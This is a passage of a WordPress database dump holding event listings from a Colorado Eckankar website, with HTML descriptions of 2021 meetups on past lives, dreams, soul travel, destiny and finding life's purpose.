wondered how to understand these feelings?</span></strong></span></p>\r\n<p><span style=\"font-size: 14pt;\">Join us for three one-hour book discussions on the topics of Past Lives and Reincarnation, Dreams, and Soul Travel. During these book discussions you will have the opportunity to share your experiences and ask questions about these topics.</span></p>\r\n<p><strong><span style=\"font-size: 14pt;\">* Learn ways to experience your past lives through dream recall.</span></strong><br />\r\n<strong><span style=\"font-size: 14pt;\">* Understand the purpose of reincarnation.</span></strong><br />\r\n<strong><span style=\"font-size: 14pt;\">* Find ways to understand your dreams.</span></strong><br />\r\n<strong><span style=\"font-size: 14pt;\">* Learn how to shift your consciousness or what is also known as Soul Travel.</span></strong></p>\r\n<p><span style=\"font-size: 14pt;\">Books will be provided for free and there is no cost for the discussions.</span></p>\r\n<p><span style=\"font-size: 14pt;\">This discussion series is sponsored by ECKANKAR, the Path of Spiritual Freedom as a community service for all people and faiths.</span></p>\r\n<p><span style=\"font-size: 14pt;\">All are welcome.</span></p>\r\n<p>*<em>Our current health regulations in Colorado do not require social distancing, face masks or vaccination to attend a large group activity; nor is Colorado Satsang requiring them. Since contracting COVID-19 may still be possible, please take the health steps you consider best. It’s appreciated that by attending you are taking responsibility for your own health.</em></p>\r\n<p><a class=\"meetupreg\" href=\"https://www.meetup.com/pagosa-springs-spiritual-experiences-group/events/wmjhpsyccmbmc/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>','In-Person Meetup - Pagosa Springs<br>\'Past Lives, Dreams, and Soul Travel\'-Book Discussion','','publish','closed','closed','','631-234-322','','','2021-09-12 23:24:30','2021-09-13 05:24:30','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=265559',0,'mec-events','',0),(265560,2,'2021-09-08 12:36:27','2021-09-08 18:36:27','<p><span style=\"color: #666666;\"><strong><span style=\"font-size: 14pt;\">Have you ever wondered if you have had past lives or feel like you have known someone for a long time even though you just met?</span></strong></span></p>\r\n<p><span style=\"color: #666666;\"><strong><span style=\"font-size: 14pt;\">Are your dreams so jumbled that you feel you cannot understand them at all?</span></strong></span></p>\r\n<p><span style=\"color: #666666;\"><strong><span style=\"font-size: 14pt;\">Have you ever felt there is more to life and wondered how to understand these feelings?</span></strong></span></p>\r\n<p><span style=\"font-size: 14pt;\">Join us for three one-hour book discussions on the topics of Past Lives and Reincarnation, Dreams, and Soul Travel. During these book discussions you will have the opportunity to share your experiences and ask questions about these topics.</span></p>\r\n<p><strong><span style=\"font-size: 14pt;\">* Learn ways to experience your past lives through dream recall.</span></strong><br />\r\n<strong><span style=\"font-size: 14pt;\">* Understand the purpose of reincarnation.</span></strong><br />\r\n<strong><span style=\"font-size: 14pt;\">* Find ways to understand your dreams.</span></strong><br />\r\n<strong><span style=\"font-size: 14pt;\">* Learn how to shift your consciousness or what is also known as Soul Travel.</span></strong></p>\r\n<p><span style=\"font-size: 14pt;\">Books will be provided for free and there is no cost for the discussions.</span></p>\r\n<p><span style=\"font-size: 14pt;\">This discussion series is sponsored by ECKANKAR, the Path of Spiritual Freedom as a community service for all people and faiths.</span></p>\r\n<p><span style=\"font-size: 14pt;\">All are welcome.</span></p>\r\n<p>*<em>Our current health regulations in Colorado do not require social distancing, face masks or vaccination to attend a large group activity; nor is Colorado Satsang requiring them. Since contracting COVID-19 may still be possible, please take the health steps you consider best. It’s appreciated that by attending you are taking responsibility for your own health.</em></p>\r\n<p><a class=\"meetupreg\" href=\"https://www.meetup.com/pagosa-springs-spiritual-experiences-group/events/wmjhpsyccnbjb/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>','In-Person Meetup - Pagosa Springs<br>\'Past Lives, Dreams, and Soul Travel\'-Book Discussion','','publish','closed','closed','','631-234-428','','','2021-09-12 23:25:35','2021-09-13 05:25:35','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=265560',0,'mec-events','',0),(265561,2,'2021-09-08 12:42:23','2021-09-08 18:42:23','<p><span style=\"color: #666666;\"><strong><span style=\"font-size: 14pt;\">Have you ever wondered if you have had past lives or feel like you have known someone for a long time even though you just met?</span></strong></span></p>\r\n<p><span style=\"color: #666666;\"><strong><span style=\"font-size: 14pt;\">Are your dreams so jumbled that you feel you cannot understand them at all?</span></strong></span></p>\r\n<p><span style=\"color: #666666;\"><strong><span style=\"font-size: 14pt;\">Have you ever felt there is more to life and wondered how to understand these feelings?</span></strong></span></p>\r\n<p><span style=\"font-size: 14pt;\">Join us for three one-hour book discussions on the topics of Past Lives and Reincarnation, Dreams, and Soul Travel. During these book discussions you will have the opportunity to share your experiences and ask questions about these topics.</span></p>\r\n<p><strong><span style=\"font-size: 14pt;\">* Learn ways to experience your past lives through dream recall.</span></strong><br />\r\n<strong><span style=\"font-size: 14pt;\">* Understand the purpose of reincarnation.</span></strong><br />\r\n<strong><span style=\"font-size: 14pt;\">* Find ways to understand your dreams.</span></strong><br />\r\n<strong><span style=\"font-size: 14pt;\">* Learn how to shift your consciousness or what is also known as Soul Travel.</span></strong></p>\r\n<p><span style=\"font-size: 14pt;\">Books will be provided for free and there is no cost for the discussions.</span></p>\r\n<p><span style=\"font-size: 14pt;\">This discussion series is sponsored by ECKANKAR, the Path of Spiritual Freedom as a community service for all people and faiths.</span></p>\r\n<p><span style=\"font-size: 14pt;\">All are welcome.</span></p>\r\n<p>*<em>Our current health regulations in Colorado do not require social distancing, face masks or vaccination to attend a large group activity; nor is Colorado Satsang requiring them. Since contracting COVID-19 may still be possible, please take the health steps you consider best. It’s appreciated that by attending you are taking responsibility for your own health.</em></p>\r\n<p><a class=\"meetupreg\" href=\"https://www.meetup.com/Spiritual-Experiences-Group-of-Durango/events/qmcqnsyccmbzb/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>','In-Person Meetup - Durango<br>\'Past Lives, Dreams, and Soul Travel\'-Book Discussion','','publish','closed','closed','','631-234-428-102','','','2021-09-12 23:14:05','2021-09-13 05:14:05','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=265561',0,'mec-events','',0),(265562,2,'2021-09-08 12:44:53','2021-09-08 18:44:53','<p><span style=\"color: #666666;\"><strong><span style=\"font-size: 14pt;\">Have you ever wondered if you have had past lives or feel like you have known someone for a long time even though you just met?</span></strong></span></p>\r\n<p><span style=\"color: #666666;\"><strong><span style=\"font-size: 14pt;\">Are your dreams so jumbled that you feel you cannot understand them at all?</span></strong></span></p>\r\n<p><span style=\"color: #666666;\"><strong><span style=\"font-size: 14pt;\">Have you ever felt there is more to life and wondered how to understand these feelings?</span></strong></span></p>\r\n<p><span style=\"font-size: 14pt;\">Join us for three one-hour book discussions on the topics of Past Lives and Reincarnation, Dreams, and Soul Travel. During these book discussions you will have the opportunity to share your experiences and ask questions about these topics.</span></p>\r\n<p><strong><span style=\"font-size: 14pt;\">* Learn ways to experience your past lives through dream recall.</span></strong><br />\r\n<strong><span style=\"font-size: 14pt;\">* Understand the purpose of reincarnation.</span></strong><br />\r\n<strong><span style=\"font-size: 14pt;\">* Find ways to understand your dreams.</span></strong><br />\r\n<strong><span style=\"font-size: 14pt;\">* Learn how to shift your consciousness or what is also known as Soul Travel.</span></strong></p>\r\n<p><span style=\"font-size: 14pt;\">Books will be provided for free and there is no cost for the discussions.</span></p>\r\n<p><span style=\"font-size: 14pt;\">This discussion series is sponsored by ECKANKAR, the Path of Spiritual Freedom as a community service for all people and faiths.</span></p>\r\n<p><span style=\"font-size: 14pt;\">All are welcome.</span></p>\r\n<p>*<em>Our current health regulations in Colorado do not require social distancing, face masks or vaccination to attend a large group activity; nor is Colorado Satsang requiring them. Since contracting COVID-19 may still be possible, please take the health steps you consider best. It’s appreciated that by attending you are taking responsibility for your own health.</em></p>\r\n<p><a class=\"meetupreg\" href=\"https://www.meetup.com/Spiritual-Experiences-Group-of-Durango/events/qmcqnsyccmbjc/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>','In-Person Meetup - Durango<br>\'Past Lives, Dreams, and Soul Travel\'-Book Discussion','','publish','closed','closed','','631-234-428-467','','','2021-09-12 23:17:33','2021-09-13 05:17:33','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=265562',0,'mec-events','',0),(265563,2,'2021-09-08 12:48:22','2021-09-08 18:48:22','<p><span style=\"color: #666666;\"><strong><span style=\"font-size: 14pt;\">Have you ever wondered if you have had past lives or feel like you have known someone for a long time even though you just met?</span></strong></span></p>\r\n<p><span style=\"color: #666666;\"><strong><span style=\"font-size: 14pt;\">Are your dreams so jumbled that you feel you cannot understand them at all?</span></strong></span></p>\r\n<p><span style=\"color: #666666;\"><strong><span style=\"font-size: 14pt;\">Have you ever felt there is more to life and wondered how to understand these feelings?</span></strong></span></p>\r\n<p><span style=\"font-size: 14pt;\">Join us for three one-hour book discussions on the topics of Past Lives and Reincarnation, Dreams, and Soul Travel. During these book discussions you will have the opportunity to share your experiences and ask questions about these topics.</span></p>\r\n<p><strong><span style=\"font-size: 14pt;\">* Learn ways to experience your past lives through dream recall.</span></strong><br />\r\n<strong><span style=\"font-size: 14pt;\">* Understand the purpose of reincarnation.</span></strong><br />\r\n<strong><span style=\"font-size: 14pt;\">* Find ways to understand your dreams.</span></strong><br />\r\n<strong><span style=\"font-size: 14pt;\">* Learn how to shift your consciousness or what is also known as Soul Travel.</span></strong></p>\r\n<p><span style=\"font-size: 14pt;\">Books will be provided for free and there is no cost for the discussions.</span></p>\r\n<p><span style=\"font-size: 14pt;\">This discussion series is sponsored by ECKANKAR, the Path of Spiritual Freedom as a community service for all people and faiths.</span></p>\r\n<p><span style=\"font-size: 14pt;\">All are welcome.</span></p>\r\n<p>*<em>Our current health regulations in Colorado do not require social distancing, face masks or vaccination to attend a large group activity; nor is Colorado Satsang requiring them. Since contracting COVID-19 may still be possible, please take the health steps you consider best. It’s appreciated that by attending you are taking responsibility for your own health.</em></p>\r\n<p><a class=\"meetupreg\" href=\"https://www.meetup.com/Spiritual-Experiences-Group-of-Durango/events/qmcqnsyccnbfb/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>','In-Person Meetup - Durango<br>\'Past Lives, Dreams, and Soul Travel\'-Book Discussion','','publish','closed','closed','','631-234-428-102-434','','','2021-09-12 23:19:28','2021-09-13 05:19:28','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=265563',0,'mec-events','',0),(265565,2,'2021-09-08 13:37:13','2021-09-08 19:37:13','','Carousel Fluent Event Display','','publish','closed','closed','','carousel-event-display','','','2023-06-20 12:56:21','2023-06-20 18:56:21','',0,'https://eckankar-colorado.org/?post_type=mec_calendars&#038;p=265565',0,'mec_calendars','',0),(265571,0,'2021-09-11 00:29:47','2021-09-11 06:29:47','','','','publish','closed','closed','','265571','','','2021-09-11 00:29:47','2021-09-11 06:29:47','',0,'https://eckankar-colorado.org/nf_sub/265571/',0,'nf_sub','',0),(265576,2,'2021-09-12 10:38:44','0000-00-00 00:00:00','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 89px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\">[MEC id=\"265565\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','MEC Event Displays For Home Page -- WORKING-1','','draft','closed','closed','','','','','2021-09-12 10:38:44','2021-09-12 16:38:44','',0,'https://eckankar-colorado.org/?page_id=265576',0,'page','',0),(265578,0,'2021-09-12 17:06:48','2021-09-12 23:06:48','','','','publish','closed','closed','','265578','','','2021-09-12 17:06:48','2021-09-12 23:06:48','',0,'https://eckankar-colorado.org/nf_sub/265578/',0,'nf_sub','',0),(265581,0,'2021-09-13 13:49:31','2021-09-13 19:49:31','','','','publish','closed','closed','','265581','','','2021-09-13 13:49:31','2021-09-13 19:49:31','',0,'https://eckankar-colorado.org/nf_sub/265581/',0,'nf_sub','',0),(265582,0,'2021-09-13 13:51:26','2021-09-13 19:51:26','','','','publish','closed','closed','','265582','','','2021-09-13 13:51:26','2021-09-13 19:51:26','',0,'https://eckankar-colorado.org/nf_sub/265582/',0,'nf_sub','',0),(265587,2,'2021-09-14 16:51:12','2021-09-14 22:51:12','<p><strong><span style=\"font-size: 18pt;\">Ask yourself, when do I feel:<br />\r\n</span></strong><em><span style=\"font-size: 16pt; color: #474040;\">* the most fulfilled?</span></em><br />\r\n<em><span style=\"font-size: 16pt; color: #474040;\">* the most grateful?</span></em><br />\r\n<em><span style=\"font-size: 16pt; color: #474040;\">* the most creative?</span></em><br />\r\n<em><span style=\"font-size: 16pt; color: #474040;\">* the most connected to my true self and life around me?</span></em></p>\r\n<p><span style=\"font-size: 14pt;\">Harold Klemp, the spiritual leader of ECKANKAR, writes in <a href=\"https://www.eckbooks.org/items/-2075-7.html?\" target=\"_blank\" rel=\"noopener\"><em>ECK Wisdom on Spiritual Freedom</em></a>, on page 3: “<span style=\"color: #474040;\">Spiritual Freedom is living to your full potential—heart, mind, and Soul. What could be more satisfying?</span>”</span></p>\r\n<p><span style=\"font-size: 14pt;\">You are warmly invited to this open discussion about a spiritual recipe for making the most of this miracle called life. Like any recipe, you can customize to suit your tastes and preferences. We will use a brief spiritual exercise to help us.</span><br />\r\n<span style=\"font-size: 14pt;\">All are welcome.</span></p>\r\n<p><span style=\"font-size: 14pt;\">We will meet via ZOOM again. Please RSVP to get the link.</span></p>\r\n<p><a class=\"meetupreg\" href=\"https://www.meetup.com/Spiritual-Experiences-Group-of-Lone-Tree/events/280750923/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>','Online Meetup - \'Spiritual Ingredients Of A Fuller Life\'<br>(An ECKANKAR Perspective)','','publish','closed','closed','','631-271','','','2021-09-14 17:02:12','2021-09-14 23:02:12','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=265587',0,'mec-events','',0),(265588,2,'2021-09-14 16:44:46','2021-09-14 22:44:46','','heart-in-hand--2','','inherit','closed','closed','','heart-in-hand-2','','','2021-09-14 16:44:46','2021-09-14 22:44:46','',265587,'https://eckankar-colorado.org/wp-content/uploads/2021/09/heart-in-hand-2.jpg',0,'attachment','image/jpeg',0),(265590,0,'2021-09-15 12:03:48','2021-09-15 18:03:48','','','','publish','closed','closed','','265590','','','2021-09-15 12:03:48','2021-09-15 18:03:48','',0,'https://eckankar-colorado.org/nf_sub/265590/',0,'nf_sub','',0),(265591,2,'2021-09-15 17:35:00','2021-09-15 23:35:00','<p><strong><span style=\"font-size: 16pt;\">When bad things happen to us, or a loved one - Is it a matter of the choices we each make or it is out of our hands?<br />\r\n</span></strong><strong><span style=\"font-size: 16pt;\">Or is it more of a karmic placement, done for Soul’s education?</span></strong><br />\r\n<strong><span style=\"font-size: 16pt;\">Do we follow the script of our destiny or break out of it?</span></strong><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">All are welcome to participate in this online spiritual discussion. We will discuss the need for spiritual freedom, a view gained from many past lives, and the self-responsibility that goes along with it. As Soul unfolds, it demonstrates creative ideas and inventiveness in dealing with life’s situations. All are welcome to share ideas, ask questions or listen while others speak of their own spiritual journey.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">Soul does enter this lifetime with a series of tasks to complete. Accepting these responsibilities results in a degree of spiritual purification. Taken as a whole, these assignments in our life make up our destiny. To start on its mission, Soul enters a new lifetime with a body of strength or weakness, of great intellect or a simple mind, in a popular shade of skin or not, either as a male or a female, into wealth or poverty.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">The idea of destiny as a concept is out of fashion in much of today’s Western society. People want to believe they are in charge of their own lives. They wish to run their own fate. They will shape their own tomorrows.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">Is it possible for fate and free will to exist side by side? Destiny controls the conditions at birth. Much of what an individual does after birth is an open book, an exercise in free will. Free will can offset or even overcome the drawbacks of destiny, but only through the awakening of one’s consciousness. One may thus reshape both his material and spiritual life.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">The description above was inspired and somewhat paraphrased from the <a href=\"https://www.eckankar.org/blog/\">ECKANKAR Blog</a> dated Oct 16, 2020.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">This event is sponsored by ECKANKAR, the Path of Spiritual Freedom, as a community service for people of all faiths and beliefs.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">The ECKANKAR Blog titled, “<em>Why Bad Things Happen to Good People</em>” is a short, timely article by the Spiritual leader of ECKANKAR. This free publication can be viewed or downloaded from the link listed above.</span></p>\r\n<p><a class=\"meetupreg\" href=\"https://www.meetup.com/SEGofDenver/events/280747265/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>','Online Meetup<br>\'Why Bad Things Happen to Good People\'','','publish','closed','closed','','631-909','','','2021-09-15 17:47:12','2021-09-15 23:47:12','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=265591',0,'mec-events','',0),(265592,2,'2021-09-15 17:33:25','2021-09-15 23:33:25','','sunset-grass','','inherit','closed','closed','','sunset-grass','','','2021-09-15 17:33:25','2021-09-15 23:33:25','',265591,'https://eckankar-colorado.org/wp-content/uploads/2021/09/sunset-grass.jpg',0,'attachment','image/jpeg',0),(265594,2,'2021-09-15 17:44:11','2021-09-15 23:44:11','<p><strong><span style=\"font-size: 16pt;\">When bad things happen to us, or a loved one - Is it a matter of the choices we each make or it is out of our hands?<br />\r\n</span></strong><strong><span style=\"font-size: 16pt;\">Or is it more of a karmic placement, done for Soul’s education?</span></strong><br />\r\n<strong><span style=\"font-size: 16pt;\">Do we follow the script of our destiny or break out of it?</span></strong><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">All are welcome to participate in this online spiritual discussion. We will discuss the need for spiritual freedom, a view gained from many past lives, and the self-responsibility that goes along with it. As Soul unfolds, it demonstrates creative ideas and inventiveness in dealing with life’s situations. All are welcome to share ideas, ask questions or listen while others speak of their own spiritual journey.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">Soul does enter this lifetime with a series of tasks to complete. Accepting these responsibilities results in a degree of spiritual purification. Taken as a whole, these assignments in our life make up our destiny. To start on its mission, Soul enters a new lifetime with a body of strength or weakness, of great intellect or a simple mind, in a popular shade of skin or not, either as a male or a female, into wealth or poverty.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">The idea of destiny as a concept is out of fashion in much of today’s Western society. People want to believe they are in charge of their own lives. They wish to run their own fate. They will shape their own tomorrows.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">Is it possible for fate and free will to exist side by side? Destiny controls the conditions at birth. Much of what an individual does after birth is an open book, an exercise in free will. Free will can offset or even overcome the drawbacks of destiny, but only through the awakening of one’s consciousness. One may thus reshape both his material and spiritual life.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">The description above was inspired and somewhat paraphrased from the <a href=\"https://www.eckankar.org/blog/\">ECKANKAR Blog</a> dated Oct 16, 2020.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">This event is sponsored by ECKANKAR, the Path of Spiritual Freedom, as a community service for people of all faiths and beliefs.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">The ECKANKAR Blog titled, “<em>Why Bad Things Happen to Good People</em>” is a short, timely article by the Spiritual leader of ECKANKAR. This free publication can be viewed or downloaded from the link listed above.</span></p>\r\n<p><a class=\"meetupreg\" href=\"https://www.meetup.com/SEGofDenver/events/280747305/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>','Online Meetup<br>\'Why Bad Things Happen to Good People\'','','publish','closed','closed','','631-909-612','','','2021-09-15 17:45:07','2021-09-15 23:45:07','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=265594',0,'mec-events','',0),(265608,2,'2021-09-23 16:38:23','2021-09-23 22:38:23','','satsang-reg-bk-3','','inherit','closed','closed','','satsang-reg-bk-3','','','2021-09-23 16:38:23','2021-09-23 22:38:23','',0,'https://eckankar-colorado.org/wp-content/uploads/2021/09/satsang-reg-bk-3.jpg',0,'attachment','image/jpeg',0),(265627,0,'2021-09-26 17:32:09','2021-09-26 23:32:09','','','','publish','closed','closed','','265627','','','2021-09-26 17:32:09','2021-09-26 23:32:09','',0,'https://eckankar-colorado.org/nf_sub/265627/',0,'nf_sub','',0),(265628,0,'2021-09-26 18:13:14','2021-09-27 00:13:14','','','','publish','closed','closed','','265628','','','2021-09-26 18:13:14','2021-09-27 00:13:14','',0,'https://eckankar-colorado.org/nf_sub/265628/',0,'nf_sub','',0),(265639,2,'2021-10-07 16:21:45','2021-10-07 22:21:45','<p><strong><span style=\"font-size: 16pt;\">How do you find purpose in your life?</span></strong><br />\r\n<br />\r\n<strong><span style=\"font-size: 16pt;\">What brings meaning to your daily life?</span></strong><br />\r\n<br />\r\n<strong><span style=\"font-size: 16pt;\">How can you bring a sense of adventure to your life?</span></strong><br />\r\n<br />\r\n<strong><span style=\"font-size: 16pt;\">What does it mean to be in charge of your own destiny?</span></strong><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">You are warmly welcomed to this spiritual discussion. We will be exploring exercises to discover purpose in your life. Along with these techniques, the evening will include contemplation and discussion related to increasing awareness of the spiritual meaning in our lives. Our goal is that each participant will discover ways to find and become aware of meaning and purpose in their lives.</span></p>\r\n<blockquote class=\"bg-blockquote border\" style=\"border-color: #954a00; margin-top: -15px; margin-left: 20px;\">\r\n<p><span style=\"color: #666666; font-size: 14pt;\">“Giving God’s love to others is the reason we’re all here. God’s love comes to us directly from God and through others. Part of Soul’s lesson is to learn to somehow give this love back to life and to everything living. Give it back to every living thing.\"</span></p>\r\n<p><span style=\"font-size: 12pt; color: #666666;\">— Harold Klemp, <em>Finding Your Life’s Purpose: A Journey of Self-Discovery and God-Discovery</em> E-Booklet</span></p>\r\n</blockquote>\r\n<p><span style=\"font-size: 14pt;\">This Meetup group, sponsored by Eckankar as a community service, is a spiritual resource for people of all faiths and beliefs. Eckankar is the Path of Spiritual Freedom. It is an individual, creative practice to experience and explore our own unique relationship with the Divine.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">To explore a deeper inner connection, check out <a class=\"link\" title=\"www.TheSoundofSoul.org\" href=\"https://www.eckankar.org/experience/hu-the-sound-of-soul/\" target=\"_blank\" rel=\"nofollow noopener ugc\">The Sound of Soul</a>.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">You can find the free ebooklet to accompany this meetup at <a href=\"https://www.eckankar.org/wp-content/uploads/2021/02/Finding_Your_Lifes_Purpose.pdf\" target=\"_blank\" rel=\"noopener\"><em>Finding Your Life’s Purpose: A Journey of Self-Discovery and God-Discovery</em></a>.<br />\r\n</span></p>\r\n<p><a class=\"meetupreg\" href=\"https://www.meetup.com/SEGofDenver/events/281272855/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>','Online Meetup<br>12 Gifts of Spiritual Living: Finding Your Life\'s Purpose','','publish','closed','closed','','631-852','','','2021-10-07 16:24:15','2021-10-07 22:24:15','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=265639',0,'mec-events','',0),(265640,0,'2021-09-30 16:03:57','2021-09-30 22:03:57','','','','publish','closed','closed','','265640','','','2021-09-30 16:03:57','2021-09-30 22:03:57','',0,'https://eckankar-colorado.org/nf_sub/265640/',0,'nf_sub','',0),(265641,0,'2021-09-30 16:50:45','2021-09-30 22:50:45','','','','publish','closed','closed','','265641','','','2021-09-30 16:50:45','2021-09-30 22:50:45','',0,'https://eckankar-colorado.org/nf_sub/265641/',0,'nf_sub','',0),(265676,0,'2021-10-05 10:29:03','2021-10-05 16:29:03','','','','publish','closed','closed','','265676','','','2021-10-05 10:29:03','2021-10-05 16:29:03','',0,'https://eckankar-colorado.org/nf_sub/265676/',0,'nf_sub','',0),(265677,2,'2021-10-05 10:38:34','2021-10-05 16:38:34','','','','publish','closed','closed','','265677','','','2021-10-05 10:38:34','2021-10-05 16:38:34','',0,'https://eckankar-colorado.org/nf_sub/265677/',0,'nf_sub','',0),(265678,2,'2021-10-05 12:17:59','2021-10-05 18:17:59','<p><span style=\"color: #454545;\"><strong><span style=\"font-size: 18pt;\">Would you like to learn how to conquer your own fears and bring more love into your life?</span></strong></span></p>\r\n<p><span style=\"font-size: 14pt;\">Do you want to learn ways to open your heart to the love of God and others and let that love shine?</span></p>\r\n<p><span style=\"font-size: 14pt;\">If you answered yes to either question, this ECK Light &amp; Sound Service will give you tools to conquer your fears and expand your ability to love. It will include personal stories and techniques that can help you in your daily life.</span></p>\r\n<p><span style=\"font-size: 14pt;\">Harold Klemp says in his book <a href=\"https://www.eckbooks.org/items/ECK_Wisdom_on_Conquering_Fear-73-0.html\"><em>ECK Wisdom on Conquering Fear</em></a>, \"Many people want to know how to get rid of fear. Fear isn\'t something you can be talked out of. The secret to getting rid of fear is to open the heart center.\"</span></p>\r\n<p><span style=\"font-size: 14pt;\">Welcome to All. Please come and explore your own answers with open hearts, eyes and ears.</span></p>\r\n<p><span style=\"font-size: 14pt;\">This Meetup group, sponsored by Eckankar as a community service, is a spiritual resource for people of all faiths and beliefs. Eckankar is the Path of Spiritual Freedom. It is an individual, creative practice to experience and explore our own unique relationship with the Divine.</span></p>\r\n<!-- REGISTRATION SHORTCODE -->\r\n<p><a class=\"reg3Button sg-popup-id-264857\" style=\"color: #685454 !important;\" href=\"#\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>','Online Zoom - ECK Light & Sound Service<br>How to Conquer Fear with Love','','publish','closed','closed','','elss-zoom-online-template-mec-537','','','2021-10-05 12:21:39','2021-10-05 18:21:39','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=265678',0,'mec-events','',0),(265679,2,'2021-10-05 12:10:08','2021-10-05 18:10:08','','sunset-eagle-1','','inherit','closed','closed','','sunset-eagle-1','','','2021-10-05 12:10:08','2021-10-05 18:10:08','',265678,'https://eckankar-colorado.org/wp-content/uploads/2021/10/sunset-eagle-1.jpg',0,'attachment','image/jpeg',0),(265680,2,'2021-10-05 12:19:32','2021-10-05 18:19:32','','','','publish','closed','closed','','265680','','','2021-10-05 12:19:32','2021-10-05 18:19:32','',0,'https://eckankar-colorado.org/nf_sub/265680/',0,'nf_sub','',0),(265681,2,'2021-12-07 17:09:52','0000-00-00 00:00:00','<p><strong><span style=\"font-size: 18pt;\">Attend an ECK Light &amp; Sound Service to...</span> </strong></p>\n<ul>\n	<li><span style=\"font-size: 14pt;\">Discover spiritual tools to meet life’s challenges</span></li>\n	<li><span style=\"font-size: 14pt;\">Awaken to the divine guidance always within you</span></li>\n	<li><span style=\"font-size: 14pt;\">Open your heart to give and receive more divine love</span></li>\n	<li><span style=\"font-size: 14pt;\">Experience how the Light and Sound of God can help you lead a happier life</span></li>\n</ul>\n<p><span style=\"font-size: 14pt;\"> You are invited to come and experience spiritual growth and fellowship as you explore what could be your next spiritual step. Join people from all walks of life to celebrate a life lived in harmony with Divine Spirit. Dynamic speakers and original creative arts demonstrate the gifts found through daily practice of the spiritual principles taught in ECKANKAR. Light refreshments, conversation and fellowship will conclude the event.</span></p>\n<p><span style=\"font-size: 12pt;\"><strong>**</strong> <em>Our current health regulations in Colorado do not require social distancing, face masks or vaccination to attend a large group activity; nor is Colorado Satsang requiring them. Since contracting COVID-19 may still be possible, please take the health steps you consider best. It’s appreciated that by attending you are taking responsibility for your own health.</em></span></p>\n<p>&nbsp;</p>','IN-PERSON - ECK Light and Sound Service<br>\'Having a Spiritual Master\'','','draft','closed','closed','','','','','2021-12-07 17:09:52','2021-12-08 00:09:52','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=265681',0,'mec-events','',0),(265682,0,'2021-10-05 15:45:50','2021-10-05 21:45:50','','','','publish','closed','closed','','265682','','','2021-10-05 15:45:50','2021-10-05 21:45:50','',0,'https://eckankar-colorado.org/nf_sub/265682/',0,'nf_sub','',0),(265690,0,'2021-10-06 22:33:06','2021-10-07 04:33:06','','','','publish','closed','closed','','265690','','','2021-10-06 22:33:06','2021-10-07 04:33:06','',0,'https://eckankar-colorado.org/nf_sub/265690/',0,'nf_sub','',0),(265691,2,'2021-10-07 09:40:37','2021-10-07 15:40:37','<p><strong><span style=\"font-size: 16pt;\">Do you want to find get insight into practical problems by studying your dreams?</span></strong><br />\r\n<strong><span style=\"font-size: 16pt;\">Have you ever had a profound dream and wondered what it meant?</span></strong><br />\r\n<strong><span style=\"font-size: 16pt;\">Would you like to talk about your dreams with others who explore the divine guidance hidden in dreams?</span></strong></p>\r\n<blockquote class=\"bg-blockquote border\" style=\"border-color: #954a00; margin-top: -15px; margin-left: 20px;\">\r\n<p><span style=\"color: #666666;\">“An inner experience can give us an insight into our outer experience. The dream becomes like a play with hidden meaning, which gives us a clue about the outcome of our outer life.”</span></p>\r\n<p><span style=\"color: #666666;\">“Keep a record of your dreams. Make a short note about every dream you recall upon awakening. Also be alert during the day for clues about your problem from other people. The Holy Spirit works through them too.”</span><span style=\"font-size: 12pt; color: #666666;\"><br />\r\n— Both quotes by Harold Klemp from the \'<a href=\"https://www.eckankar.org/blog/\" target=\"_blank\" rel=\"noopener\">ECKANKAR Blog</a>\' post referenced below</span></p>\r\n</blockquote>\r\n<p><span style=\"font-size: 14pt;\">In dreams the creative imagination isn’t limited by the barriers in the physical world. Dreams can nudge you to consider a solution that your practical mind would not even consider. In your dream world you can find clues to overcome health, employment and financial challenges. All people dream and remember dreams to a different degree. Only you can decide to dive into the creative adventure awaiting you in the dream worlds. You can combine the treasure chest of options hidden in your dreams with the experience you gain in your daily life and to find new understanding of the practical problems you face. A dream can nudge you to check into an area of your personal life that needs attention or reassure you that things will work out in times of change.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">Join others for a lively discussion of the practical divine guidance discovered in dreams. Hear how others apply a spiritual focus to remember and understanding 